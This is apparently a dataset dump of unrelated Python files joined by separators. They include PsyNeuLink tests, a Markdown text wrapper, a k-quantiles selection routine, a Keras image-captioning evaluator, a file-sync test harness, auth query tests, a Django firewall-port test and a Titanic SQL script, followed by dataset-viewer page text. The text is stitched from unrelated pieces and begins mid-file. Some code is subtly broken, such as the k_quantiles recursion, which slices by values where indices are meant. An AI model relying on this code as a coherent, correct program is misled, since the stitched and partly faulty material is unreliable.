    # end of build_regression_train_request
# end of BaseTestCase
|
import inspect
import psyneulink as pnl
import pytest
from psyneulink.core.components.projections.modulatory.modulatoryprojection import ModulatoryProjection_Base
from psyneulink.core.components.projections.pathway.pathwayprojection import PathwayProjection_Base
# gather all Component classes (a set to ensure no duplicates)
component_classes = []
component_class_constructor_arguments = {}

for item in pnl.__all__:
    # Fixed: use getattr instead of eval(f'pnl.{item}') - same lookup,
    # without dynamic code evaluation.
    evaled = getattr(pnl, item)
    if isinstance(
        evaled,
        pnl.core.components.component.ComponentsMeta
    ):
        component_classes.append(evaled)
        component_class_constructor_arguments[evaled] = inspect.signature(
            evaled.__init__
        ).parameters

component_classes.sort(key=lambda x: x.__name__)
@pytest.mark.parametrize(
    'class_type',
    [
        pnl.Mechanism_Base,
        pnl.Function_Base,
        pnl.Port_Base,
        ModulatoryProjection_Base,
        PathwayProjection_Base,
    ]
)
def test_abstract_classes(class_type):
    """Instantiating an abstract base class must raise TypeError."""
    with pytest.raises(TypeError) as exc_info:
        class_type()
    assert 'abstract class' in str(exc_info.value)
@pytest.mark.parametrize(
    'class_',
    component_classes
)
def test_function_parameters_stateless(class_):
    """Verify the function Parameter is declared stateless, if present."""
    try:
        stateful = class_.parameters.function.stateful
    except AttributeError:
        # class has no function Parameter - nothing to check
        return
    assert stateful is False, (
        f'{class_.__name__}.parameters.function.stateful is True. '
        'The function Parameter for Components is currently '
        'expected to be stateless (defined as stateful=False)'
    )
@pytest.mark.parametrize(
    'class_',
    component_classes
)
def test_parameters_user_specified(class_):
    """Constructor args backed by a Parameter must default to None."""
    accepted_kinds = {
        inspect.Parameter.POSITIONAL_OR_KEYWORD,
        inspect.Parameter.KEYWORD_ONLY,
    }
    constructor_parameters = inspect.signature(class_.__init__).parameters
    violators = {
        name
        for name, param in constructor_parameters.items()
        if param.kind in accepted_kinds
        and name in class_.parameters.names()
        and param.default is not inspect.Parameter.empty
        and param.default is not None
    }

    message = (
        "If a value other than None is used as the default value in a class's"
        ' constructor/__init__, for an argument corresponding to a Parameter,'
        ' _user_specified will always be True. The default value should be'
        " specified in the class's Parameters inner class. Violators for"
        f' {class_.__name__}: {violators}'
    )
    assert violators == set(), message
|
#Standard Library Input
#Third Party Inputs
#Local Application Inputs
class Wrapper():
    """Markdown-style text decorators (bold, italics, code, quotes)."""

    def BoldWrapper(self, message):
        """Wrap *message* in ``**`` for bold."""
        return f'**{message}**'

    def UpperWrapper(self, message):
        """Return *message* upper-cased."""
        return message.upper()

    def ItalicWrapper(self, message):
        """Wrap *message* in ``*`` for italics."""
        return f'*{message}*'

    def AllAngryWrapper(self, message):
        """Shout: append '!', upper-case, italicize, then bold."""
        # Fixed: removed the redundant f-string wrapper around a value
        # that is already a string.
        return self.BoldWrapper(
            self.ItalicWrapper(self.UpperWrapper(message + "!")))

    def CodeWrapper(self, message):
        """Wrap *message* in backticks for inline code."""
        return f'`{message}`'

    def CodeBlockWrapper(self, message):
        """Wrap *message* in triple backticks for a code block."""
        return f'```{message}```'

    def BackQuoteWrapper(self, message):
        """Prefix *message* with '> ' for a block quote."""
        return f'> {message}'
#!/usr/bin/env python
# coding=utf-8
import math
def k_quantiles(items, k):
    """Return the k-quantile boundary values of ``items``.

    ``items`` is partially reordered in place by the selection and
    partition steps.

    :param items: mutable sequence of comparable values
    :param k: number of quantiles; ``k == 1`` yields no boundaries
    """
    # Fixed: removed a dead `index = median_index(len(items))` that was
    # computed before the branch but unused in every path.
    if k == 1:
        return []
    if k % 2:
        # Odd k: take the two boundaries straddling the middle, then
        # recurse on each side with k // 2 quantiles.
        n = len(items)
        left_index = math.ceil((k // 2) * (n / k)) - 1
        right_index = n - left_index - 1
        left = select(items, left_index)
        right = select(items, right_index)
        partition(items, left)
        # NOTE(review): these slices use the boundary *values* as
        # indices; that only coincides with the intended split when
        # values equal their sorted positions - confirm for odd k.
        lower = k_quantiles(items[:left], k // 2)
        partition(items, right)
        upper = k_quantiles(items[right + 1:], k // 2)
        return lower + [left, right] + upper
    # Even k: split at the median and recurse on both halves.
    index = median_index(len(items))
    median = select(items, index)
    partition(items, median)
    return (k_quantiles(items[:index], k // 2)
            + [median]
            + k_quantiles(items[index + 1:], k // 2))


def median_index(n):
    """Index of the (lower) median for a sequence of length ``n``."""
    if n % 2:
        return n // 2
    return n // 2 - 1


def partition(items, element):
    """Partition ``items`` in place around ``element`` (Lomuto style).

    ``element`` must be present in ``items``; it is swapped to the end
    when encountered, then placed at its final sorted position, which
    is returned.
    """
    i = 0
    for j in range(len(items) - 1):
        if items[j] == element:
            items[j], items[-1] = items[-1], items[j]
        if items[j] < element:
            items[i], items[j] = items[j], items[i]
            i += 1
    items[i], items[-1] = items[-1], items[i]
    return i


def select(items, n):
    """Return the ``n``-th smallest value (0-based) of ``items``.

    Median-of-medians selection: each group of five is sorted in place
    to find a good pivot, then the search recurses into one side.
    """
    if len(items) <= 1:
        return items[0]
    medians = []
    for i in range(0, len(items), 5):
        group = sorted(items[i:i + 5])
        items[i:i + 5] = group
        medians.append(group[median_index(len(group))])
    pivot = select(medians, median_index(len(medians)))
    index = partition(items, pivot)
    if n == index:
        return items[index]
    if n < index:
        return select(items[:index], n)
    return select(items[index + 1:], n - index - 1)
# Demo: split 1..18 into quartiles.
arr = [1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18]
# Fixed: Python 2 `print expr` statement -> print() call (a single-arg
# print() behaves the same under both Python 2 and 3).
print(k_quantiles(arr, 4))
|
from os import path, system
# DNA systems whose helical-axis input trajectories should be opened.
hosts = [ 'atat_21mer', 'g_tract_21mer', 'a_tract_21mer', 'gcgc_21mer',
         'ctct_21mer', 'tgtg_21mer', 'tat_21mer', 'tat_1_21mer', 'tat_2_21mer', 'tat_3_21mer']
rootfolder = '/home/yizaochen/codes/dna_rna/all_systems'  # NOTE(review): unused in this snippet
fhelix_folder = '/home/yizaochen/codes/dna_rna/length_effect/find_helical_axis'
# Print (rather than execute) the vmd command loading each system's
# pdb structure plus its dcd trajectory.
for host in hosts:
    f_input_folder = path.join(fhelix_folder, host, 'input')
    f_pdb = path.join(f_input_folder, 'bdna+bdna.npt4.all.pdb')
    f_dcd = path.join(f_input_folder, 'bdna+bdna.0_5000ns.50000frames.dcd')
    cmd = f'vmd -pdb {f_pdb} {f_dcd}'
    print(cmd)
"""
Test for testing runbook generated json against known json
"""
import os
from calm.dsl.runbooks import runbook_json
from decision_task import DslDecisionRunbook
from existing_endpoint import DslExistingEndpoint
from parallel import DslParallelRunbook
from runbook_variables import DslRunbookWithVariables
from simple_runbook import DslSimpleRunbook
from while_loop import DslWhileLoopRunbook
def test_runbook_json(Runbook, json_file):
    """
    Test the generated json for a runbook against known output

    :param Runbook: runbook class under test
    :param json_file: file name (relative to this directory) holding
        the expected json
    """
    print("JSON compilation test for {}".format(Runbook.action_name))
    dir_path = os.path.dirname(os.path.realpath(__file__))
    file_path = os.path.join(dir_path, json_file)

    generated_json = runbook_json(Runbook)
    # Fixed: close the expected-output file deterministically (the
    # original leaked the handle via open(...).read()).
    with open(file_path) as known_file:
        known_json = known_file.read()

    assert generated_json == known_json
    print("JSON compilation successful for {}".format(Runbook.action_name))
def test_runbooks():
    """Run the json-compilation check for every sample runbook."""
    cases = [
        ("test_decision_task.json", DslDecisionRunbook),
        ("test_existing_endpoint.json", DslExistingEndpoint),
        ("test_parallel.json", DslParallelRunbook),
        ("test_runbook_variables.json", DslRunbookWithVariables),
        ("test_simple_runbook.json", DslSimpleRunbook),
        ("test_while_loop.json", DslWhileLoopRunbook),
    ]
    for json_file, runbook in cases:
        test_runbook_json(runbook, json_file)


if __name__ == "__main__":
    test_runbooks()
|
import os
import shutil
import fileinput
from time import sleep
# Two syncthing-style clients, each with its own shared Sync directory
# (paths are relative to the parent of the working directory).
FOLDER1 = "/../client1/conf/Sync"
FOLDER2 = "/../client2/conf/Sync"
TEST_STRING = "This is a test string to verify that sharing works."
PWD = os.getcwd()
FILE1 = ('test.txt')
FILE2 = ('test2.txt')
STRING2 = "This is a second string."
STRING3 = "Even more exciting."
# Example end-to-end scenario, kept for reference. NOTE(review): the
# first call below is missing its closing parenthesis.
#def main():
#    add_text(FILE1, TEST_STRING, FOLDER1
#    replace_text(FILE1, FOLDER2, STRING2, TEST_STRING)
#    add_text(FILE2, STRING3, FOLDER2)
#    delete_file(FILE1, FOLDER1)
def clear():
    """Delete every regular file in both clients' Sync folders.

    Errors for individual files are printed and skipped. The two
    previously duplicated per-folder loops were merged into one.
    """
    for folder in (FOLDER1, FOLDER2):
        directory = PWD + folder
        for the_file in os.listdir(directory):
            file_path = os.path.join(directory, the_file)
            try:
                if os.path.isfile(file_path):
                    os.unlink(file_path)
            except Exception as e:
                # best-effort cleanup: report and continue
                print(e)
def delete_file(filename, folder):
    """Remove *filename* from *folder*, then wait for the peer to sync.

    Prints a message and returns early when the file is absent.
    """
    os.chdir(PWD + folder)
    if not os.path.exists(filename):
        print("The file does not exist")
        return
    os.remove(filename)
    check_change(filename, "", folder)
def replace_text(filename, folder, textToReplace, textToRemove):
    """Replace *textToRemove* with *textToReplace* inside *filename*.

    Rewrites the file in *folder*, then waits for the peer folder to
    receive the new content.
    """
    os.chdir(PWD + folder)
    if not os.path.exists(filename):
        print("The file does not exist.")
        return
    # Fixed: use context managers so the handles are closed even if
    # read/write raises.
    with open(filename, 'r') as f:
        text = f.read()
    newText = text.replace(textToRemove, textToReplace)
    with open(filename, 'w') as f:
        f.write(newText)
    check_change(filename, newText, folder)
def add_text(filename, filetext, folder):
    """Create (or truncate) *filename* in *folder* with *filetext*.

    Waits for the change to reach the peer folder.
    """
    os.chdir(PWD + folder)
    # Fixed: context manager closes the handle even if write raises;
    # 'w+' matches the original open mode.
    with open(filename, 'w+') as f:
        f.write(filetext)
    check_change(filename, filetext, folder)
def move_file(filename, folder):
    """Copy a (large) file from ../dataToShare into *folder* and poll
    until it appears in the other client's folder.

    NOTE(review): paths are built by plain string concatenation, so
    *filename* appears to be expected to start with '/' (unlike
    FILE1/FILE2 above) - confirm against callers.
    """
    shutil.copy2(PWD+"/../dataToShare" +filename, PWD+folder)
    TIMEOUT = 70
    # Poll once per second for up to TIMEOUT seconds.
    for i in range(TIMEOUT):
        sleep(1)
        # Check the *other* client's folder for the propagated file.
        if folder==FOLDER1:
            if os.path.exists(PWD+FOLDER2+filename):
                print("Big file transferred successfully.")
                return
        else:
            if os.path.exists(PWD+FOLDER1+filename):
                print ("Big file transferred successfully.")
                return
    print ("Big file transfer failed")
def check_change(filename, textCheck, folder):
    """Poll the peer client's folder until *filename* holds *textCheck*.

    An empty *textCheck* means the file is expected to be deleted.
    Polls once per second for up to TIMEOUT seconds, printing the
    outcome.
    """
    TIMEOUT = 70
    # Fixed: initialize `text` so the final failure message cannot raise
    # NameError when the file was never readable.
    text = ""
    for i in range(TIMEOUT):
        sleep(1)
        # Look in the *other* client's folder for the propagated change.
        if folder == FOLDER1:
            os.chdir(PWD + FOLDER2)
        else:
            os.chdir(PWD + FOLDER1)
        try:
            # Fixed: context manager closes the handle (the original
            # never closed f2).
            with open(filename, 'r') as f2:
                text = f2.read()
            if textCheck == text:
                print("File transferred successfully.")
                return
        except FileNotFoundError:
            if textCheck == '':
                print("File deleted successfully.")
                return
            elif i == TIMEOUT - 1:
                print("File not transferred.")
                return
    print("Oops. Something went wrong. Output: " + text)
#if __name__=="__main__":
# main()
|
from numpy import argmax
from pickle import load
from keras.preprocessing.text import Tokenizer
from keras.preprocessing.sequence import pad_sequences
from nltk.translate.bleu_score import corpus_bleu
# remove start/end sequence tokens from a summary
def cleanup_summary(summary):
    """Strip the 'startseq'/'endseq' sentinel tokens from a caption."""
    start_token = 'startseq '
    end_token = ' endseq'
    # drop the leading start-of-sequence token when present
    if summary.find(start_token) > -1:
        summary = summary[len(start_token):]
    # truncate at the end-of-sequence token when present
    end_at = summary.find(end_token)
    if end_at > -1:
        summary = summary[:end_at]
    return summary
# map an integer to a word
def word_for_id(integer, tokenizer):
    """Return the vocabulary word mapped to *integer*, or None."""
    return next(
        (word for word, index in tokenizer.word_index.items()
         if index == integer),
        None,
    )
# generate a description for an image
def generate_desc(model, tokenizer, photo, max_length):
    """Greedily decode a caption for *photo*, one token at a time.

    Starts from the 'startseq' seed and stops at 'endseq', an
    unmappable token id, or *max_length* tokens.
    """
    caption = 'startseq'
    for _ in range(max_length):
        # encode the caption-so-far and pad it to the model's length
        encoded = tokenizer.texts_to_sequences([caption])[0]
        encoded = pad_sequences([encoded], maxlen=max_length)
        # pick the highest-probability next token
        probs = model.predict([photo, encoded], verbose=0)
        word = word_for_id(argmax(probs), tokenizer)
        # an unmappable id ends the caption
        if word is None:
            break
        caption += ' ' + word
        # the explicit end-of-sequence token also ends it
        if word == 'endseq':
            break
    return caption
def evaluate_model(model, descriptions, photos, tokenizer, max_length):
    """Score the model on *descriptions* with corpus BLEU-1..4."""
    actual = []
    predicted = []
    for key, desc_list in descriptions.items():
        # decode a caption and strip the sentinel tokens
        candidate = cleanup_summary(
            generate_desc(model, tokenizer, photos[key], max_length))
        # references: all cleaned ground-truth captions for this image
        actual.append([cleanup_summary(d).split() for d in desc_list])
        predicted.append(candidate.split())
    # calculate BLEU score
    print('BLEU-1: %f' % corpus_bleu(actual, predicted, weights=(1.0, 0, 0, 0)))
    print('BLEU-2: %f' % corpus_bleu(actual, predicted, weights=(0.5, 0.5, 0, 0)))
    print('BLEU-3: %f' % corpus_bleu(actual, predicted, weights=(0.3, 0.3, 0.3, 0)))
    print('BLEU-4: %f' % corpus_bleu(actual, predicted, weights=(0.25, 0.25, 0.25, 0.25)))
def prepare_evaluate_params(c, model, feature_file_name):
    """Load the test split, photo features, descriptions and tokenizer.

    :param c: project config object providing the *FilePath helpers
    :param model: caption model (only used to print its summary here)
    :param feature_file_name: name of the extracted-features file
    :returns: tuple (tokenizer, test_features, test_descriptions,
        max_length)
    """
    # Fixed: removed unused locals (history_file_name,
    # best_epoch_filename) and unused imports (create_sequences,
    # data_generator, max_length_desc).
    from utils.dataprep import load_set, load_photo_features
    from utils.dataprep import load_clean_descriptions, get_tokenizer

    feature_file_name = c.ExtractedFeaturesFilePath(feature_file_name)
    model.summary()

    test = load_set(c.FlickrTextFilePath("Flickr_8k.testImages.txt"))
    test_features = load_photo_features(feature_file_name, test)
    test_descriptions = load_clean_descriptions(
        c.ExtractedFeaturesFilePath('descriptions.txt'), test)
    print("Test photos: %i" % (len(test_features)))
    print("test descriptions: %i" % (len(test_descriptions)))

    # prepare tokenizer
    tokenizer = get_tokenizer(c.TokenizerFilePath)
    max_length = 34  # check my comment on the model summary cell.
    vocab_size = len(tokenizer.word_index) + 1
    print( "Tokensizer vocalulary size: %i, Description max length: %i " % (vocab_size, max_length))

    # print("running bleu test ... ")
    # evaluate_model(model, test_descriptions, test_features, tokenizer, max_length)
    return tokenizer, test_features, test_descriptions, max_length
def get_demo_captions(model, photos, tokenizer, max_length, demo_list):
    """Generate a caption for every photo key in *demo_list*."""
    return [
        generate_desc(model, tokenizer, photos[key], max_length)
        for key in demo_list
    ]
def demo_captions(c, model, test_features, tokenizer, test_descriptions, max_length):
    """Display each demo image together with its generated caption.

    :param c: project config providing flickr_images_directory
    :param model: trained captioning model
    :param test_features: photo-feature dict keyed by image id
    :param tokenizer: fitted keras Tokenizer
    :param test_descriptions: unused; kept for call compatibility
    :param max_length: maximum caption length in tokens
    """
    # Fixed: removed the unused 'curly' variable and the unused
    # 'imgplot' assignment.
    demo_list = ('3497224764_6e17544e0d','3044500219_778f9f2b71','3119076670_64b5340530','1220401002_3f44b1f3f7', '241345844_69e1c22464', '2762301555_48a0d0aa24', '3364861247_d590fa170d', '3406930103_4db7b4dde0', '1343426964_cde3fb54e8', '2984174290_a915748d77', '2913965136_2d00136697', '2862004252_53894bb28b', '3697359692_8a5cdbe4fe')
    demo_path = c.flickr_images_directory + "/"
    demo_captions_list = get_demo_captions(model, test_features, tokenizer, max_length, demo_list)
    import matplotlib.pyplot as plt
    from keras.preprocessing.image import load_img
    for k in range(len(demo_list)):
        img = load_img(demo_path + demo_list[k] + '.jpg')
        plt.imshow(img)
        plt.show()
        print(demo_captions_list[k])
def predict_img( model, tokenizer, max_length, img_filepath, cnn_model,cnn_model_features, cnn_model_app, target_size = (224,224)):
    """Classify an image, extract its CNN features and greedily decode a
    caption, printing intermediate results and showing the image.

    :param model: trained captioning model (photo features + sequence in)
    :param tokenizer: fitted keras Tokenizer (word <-> index mapping)
    :param max_length: maximum caption length in tokens
    :param img_filepath: path to the image file to caption
    :param cnn_model: full CNN with softmax head (classification only)
    :param cnn_model_features: CNN truncated to emit feature vectors
    :param cnn_model_app: keras.applications module supplying
        preprocess_input / decode_predictions for this CNN family
    :param target_size: input resolution expected by the CNN
    """
    from keras.preprocessing.image import load_img, img_to_array
    img = load_img(img_filepath,target_size=target_size )
    img_in = img_to_array(img)
    # add a batch dimension of 1; assumes a 3-channel (RGB) image
    img_in = img_in.reshape((1, target_size[0], target_size[1], 3))
    img_in = cnn_model_app.preprocess_input(img_in)
    # generate classification predictions for the image -- informational only
    img_p = cnn_model.predict(img_in)
    label = cnn_model_app.decode_predictions(img_p)
    prediction = label[0][0]
    print("%s (%.2f%%)" % (prediction[1], prediction[2]*100))
    print(label)
    # generate the feature representation (cnn_model_features is assumed
    # to already have its softmax layer removed; the commented lines
    # below show how it would be built)
    # cnn_model.layers.pop()
    # cnn_model_features = Model(inputs=cnn_model_features.inputs, outputs=cnn_model_features.layers[-1].output)
    photo = cnn_model_features.predict(img_in)
    # seed the generation process
    in_text = 'startseq'
    # iterate over the whole length of the sequence
    for i in range(max_length):
        # integer encode input sequence
        sequence = tokenizer.texts_to_sequences([in_text])[0]
        # pad input
        sequence = pad_sequences([sequence], maxlen=max_length)
        # predict next word
        yhat = model.predict([photo,sequence], verbose=0)
        # convert probability to integer
        yhat = argmax(yhat)
        # map integer to word
        word = word_for_id(yhat, tokenizer)
        # stop if we cannot map the word
        if word is None:
            break
        # append as input for generating the next word
        in_text += ' ' + word
        # intermediary print of the caption built so far
        print("%i>> %s" %(i, in_text))
        # stop if we predict the end of the sequence
        if word == 'endseq':
            break
    import matplotlib.pyplot as plt
    plt.imshow(img) # RGB floats clip to 0..1; otherwise use integers
    plt.show()
    print("CNN model classification: %s (%.2f%%)" % (prediction[1], prediction[2]*100))
    print("caption: %s" % (in_text))
|
import pytest
from auth_api.db import db
from auth_api.queries import UserQuery
from tests.auth_api.queries.query_base import TestQueryBase, USER_LIST
class TestUserQueries(TestQueryBase):
    """
    Tests cases where a subject in written into the database
    and can be returned if correct subject is called.
    """

    @pytest.mark.parametrize('ssn', ['SSN_1', 'SSN_2', 'SSN_3'])
    def test__correct_number_of_ssns__return_correct_number_of_users(
        self,
        seeded_session: db.Session,
        ssn: str,
    ):
        """
        Test that exactly one seeded user exists with the given ssn.

        NOTE(review): this checks the static USER_LIST fixture rather
        than querying seeded_session - confirm that is intended.

        :param seeded_session: Mocked database session
        :param ssn: SSN to look up in the seeded fixture data
        """

        # -- Act -------------------------------------------------------------

        seeded_users = [user for user in USER_LIST if user['ssn'] == ssn]

        # -- Assert ----------------------------------------------------------

        # Fixed: removed a leftover debug print(seeded_users).
        assert len(seeded_users) > 0
        assert len(seeded_users) == 1

    @pytest.mark.parametrize('user', USER_LIST)
    def test__has_ssn__ssn_exists__return_correct_user(
        self,
        seeded_session: db.Session,
        user: dict,
    ):
        """
        Test if the current user, with a given ssn, exists in the
        database and returns true if it exists.

        :param seeded_session: Mocked database session
        :param user: Current user inserted into the test
        """

        # -- Act -------------------------------------------------------------

        query = UserQuery(seeded_session) \
            .has_ssn(user['ssn']) \
            .one_or_none()

        # -- Assert ----------------------------------------------------------

        assert query is not None
        assert query.ssn == user['ssn']

    def test__has_snn__ssn_does_not_exists__return_none(
        self,
        seeded_session: db.Session,
    ):
        """
        Test if a user with an invalid ssn exists in the database and
        returns None if it does not exist.

        :param seeded_session: Mocked database session
        """

        # -- Act -------------------------------------------------------------

        query = UserQuery(seeded_session) \
            .has_ssn('invalid_ssn') \
            .one_or_none()

        # -- Assert ----------------------------------------------------------

        assert query is None

    @pytest.mark.parametrize('user', USER_LIST)
    def test__has_tin__tin_exists__return_correct_user(
        self,
        seeded_session: db.Session,
        user: dict,
    ):
        """
        Test if the current user, with a given tin, exists in the
        database and returns true if it exists.

        :param seeded_session: Mocked database session
        :param user: Current user inserted into the test
        """

        # -- Act -------------------------------------------------------------

        query = UserQuery(seeded_session) \
            .has_tin(user['cvr']) \
            .one_or_none()

        # -- Assert ----------------------------------------------------------

        assert query is not None
        assert query.cvr == user['cvr']

    def test__has_tin__tin_does_not_exists__return_none(
        self,
        seeded_session: db.Session,
    ):
        """
        Test if a user with an invalid tin exists in the database and
        returns None if it does not exist.

        :param seeded_session: Mocked database session
        """

        # -- Act -------------------------------------------------------------

        query = UserQuery(seeded_session) \
            .has_tin('invalid_tin') \
            .one_or_none()

        # -- Assert ----------------------------------------------------------

        assert query is None
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.test import TestCase
from dashboard.models import Node, Order
from .models import History_order
from django.contrib.auth.models import User
from django.utils import timezone
from datetime import datetime, timedelta
from .views import firewall_open_port
# Create your tests here.
class HistoryorderModeltest(TestCase):
    """Model and firewall-helper tests for History_order."""

    def setUp(self):
        """Seed one user with a currently-valid trial ('T') order."""
        u = User()
        u.save()
        History_order.objects.create(
            user=u,
            plan='T',
            order_date=timezone.now() - timedelta(days=1),
            valid_date=timezone.now() - timedelta(days=1),
            dead_date=timezone.now() + timedelta(days=1),
        )

    def test_status(self):
        """An order inside its valid window reports status 1."""
        ho = History_order.objects.all()[0]
        self.assertEqual(ho.status(), 1)

    def test_tzinfo(self):
        """The stored order_date comes back naive (tzinfo is None)."""
        ho = History_order.objects.all()[0]
        self.assertEqual(ho.order_date.tzinfo, None)

    def test_firewall_open_port(self):
        """Opening a port reports that port in the firewall output."""
        port = 20002
        shell_output = firewall_open_port(20002)
        # Fixed: Python 2 `print expr` statement -> print() call (a
        # single-arg print() behaves the same under Python 2 and 3).
        print(shell_output)
        self.assertEqual(str(port) in shell_output, True)
# Exploration script: answers a set of questions about the Titanic
# dataset stored in the `titanic_set2` Postgres table.
import psycopg2

# Connection credentials (redacted before committing).
dbname = 'REDACTED'
user = 'REDACTED'
password = 'REDACTED'
host = 'REDACTED'

pg_conn = psycopg2.connect(database=dbname, user=user, password=password, host=host)
pg_curs = pg_conn.cursor()
# Each section below prints a question, runs one aggregate query and
# prints the raw fetched rows.
print("Titanic questions")

print("\nHow many passengers survived, and how many died? (Percentage survival)")
pg_curs.execute('SELECT AVG(survived) FROM titanic_set2;')
print(pg_curs.fetchall())

print("\nHow many passengers were in each class?")
pg_curs.execute(' \
SELECT pclass, COUNT(pclass) \
FROM titanic_set2 \
GROUP By pclass; \
')
print(pg_curs.fetchall())

print("\nHow many passengers survived/died within each class?")
print("Survived")
pg_curs.execute(' \
SELECT pclass, COUNT(survived) \
FROM titanic_set2 \
WHERE survived = 1 \
GROUP BY pclass \
ORDER BY pclass \
;')
print(pg_curs.fetchall())
print("Did not survive")
pg_curs.execute(' \
SELECT pclass, COUNT(survived) \
FROM titanic_set2 \
WHERE survived = 0 \
GROUP BY pclass \
ORDER BY pclass \
;')
print(pg_curs.fetchall())

print("\nWhat was the average age of survivors vs nonsurvivors?")
pg_curs.execute(' \
SELECT survived, AVG(age) \
FROM titanic_set2 \
GROUP BY survived \
;')
print(pg_curs.fetchall())

print("\nWhat was the average age of each passenger class?")
pg_curs.execute(' \
SELECT pclass, AVG(age) \
FROM titanic_set2 \
GROUP BY pclass \
ORDER BY pclass \
;')
print(pg_curs.fetchall())

print("\nWhat was the average fare by passenger class? By survival?")
print("By class")
pg_curs.execute(' \
SELECT pclass, AVG(fare) \
FROM titanic_set2 \
GROUP BY pclass \
ORDER BY pclass \
;')
print(pg_curs.fetchall())
print("By survival")
pg_curs.execute(' \
SELECT survived, AVG(fare) \
FROM titanic_set2 \
GROUP BY survived \
ORDER BY survived \
;')
print(pg_curs.fetchall())

print("\nHow many siblings/spouses aboard on average, by passenger class? By survival?")
print("By class")
pg_curs.execute(' \
SELECT pclass, AVG(siblingsspousesaboard) \
FROM titanic_set2 \
GROUP BY pclass \
ORDER BY pclass \
;')
print(pg_curs.fetchall())
print("By survival")
pg_curs.execute(' \
SELECT survived, AVG(siblingsspousesaboard) \
FROM titanic_set2 \
GROUP BY survived \
ORDER BY survived \
;')
print(pg_curs.fetchall())

print("\nHow many parents/children aboard on average, by passenger class? By survival?")
print("By class")
pg_curs.execute(' \
SELECT pclass, AVG(parentschildrenaboard) \
FROM titanic_set2 \
GROUP BY pclass \
ORDER BY pclass \
;')
print(pg_curs.fetchall())
print("By survival")
pg_curs.execute(' \
SELECT survived, AVG(parentschildrenaboard) \
FROM titanic_set2 \
GROUP BY survived \
ORDER BY survived \
;')
print(pg_curs.fetchall())
print("\nDo any passengers have the same name?")
print("Total names")
pg_curs.execute(' \
SELECT COUNT(name) \
FROM titanic_set2 \
;')
print(pg_curs.fetchall())
print("Total distinct names")
pg_curs.execute(' \
SELECT COUNT(DISTINCT name) \
FROM titanic_set2 \
;')
# Fixed: fetchall() was called twice; the first call drained the result
# set, so the second printed an empty list (see the recorded output
# below, where "Total distinct names" shows []).
print(pg_curs.fetchall())
print("All names unique")
pg_curs.close()
# Recorded output from a prior run. Note: "Total distinct names" shows
# [] because fetchall() was called twice (the first call drained the
# cursor), so the "All names unique" conclusion was not actually
# verified by that run.
"""
Output
Titanic questions
How many passengers survived, and how many died? (Percentage survival)
[(Decimal('0.38556933483652762120'),)]
How many passengers were in each class?
[(1, 216), (3, 487), (2, 184)]
How many passengers survived/died within each class?
Survived
[(1, 136), (2, 87), (3, 119)]
Did not survive
[(1, 80), (2, 97), (3, 368)]
What was the average age of survivors vs nonsurvivors?
[(0, 30.1385321100917), (1, 28.4083918128272)]
What was the average age of each passenger class?
[(1, 38.7889814815587), (2, 29.8686413042571), (3, 25.188747433238)]
What was the average fare by passenger class? By survival?
By class
[(1, 84.154687528257), (2, 20.6621831810993), (3, 13.7077075010452)]
By survival
[(0, 22.2085840951412), (1, 48.3954076976107)]
How many siblings/spouses aboard on average, by passenger class? By survival?
By class
[(1, Decimal('0.41666666666666666667')), (2, Decimal('0.40217391304347826087')), (3, Decimal('0.62012320328542094456'))]
By survival
[(0, Decimal('0.55779816513761467890')), (1, Decimal('0.47368421052631578947'))]
How many parents/children aboard on average, by passenger class? By survival?
By class
[(1, Decimal('0.35648148148148148148')), (2, Decimal('0.38043478260869565217')), (3, Decimal('0.39630390143737166324'))]
By survival
[(0, Decimal('0.33211009174311926606')), (1, Decimal('0.46491228070175438596'))]
Do any passengers have the same name?
Total names
[(887,)]
Total distinct names
[]
All names unique
"""
import os
from os.path import dirname, join, isabs, isdir, exists, abspath, realpath
import pytest
import sys
import datetime as dt
# Make the project root importable whether or not __file__ is defined
# (e.g. when this code is pasted into an interactive session).
try:
    thisdir = os.path.dirname(os.path.abspath(__file__))
    sys.path.append(os.path.join(thisdir, '..'))
except NameError:
    # Fixed: narrowed a bare `except:` - only an undefined __file__
    # is expected here; fall back to the relative parent directory.
    sys.path.append('..')

from dibs.settings import config, resolved_path
def test_relative_to_caller():
    """A path relative to the calling test file resolves to this file."""
    expected = abspath(__file__)
    assert resolved_path('tests/test_resolved_path.py') == expected
def test_relative_to_settings():
    """A path relative to the settings dir resolves under the project."""
    expected = abspath(join(dirname(__file__), os.pardir, 'admin/run-server'))
    assert resolved_path('admin/run-server') == expected
|
import time
from datetime import datetime
import config
from web.models.models import Instance
from web.basehandler import BaseHandler
class InstancesHandler(BaseHandler):
    """Handler polled to run background instance tasks."""

    def get(self):
        """Log that the task runner endpoint was invoked.

        Fixed: Python 2 `print expr` statement -> print() call (a
        single-arg print() behaves the same under Python 2 and 3).
        """
        print("running tasks")
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.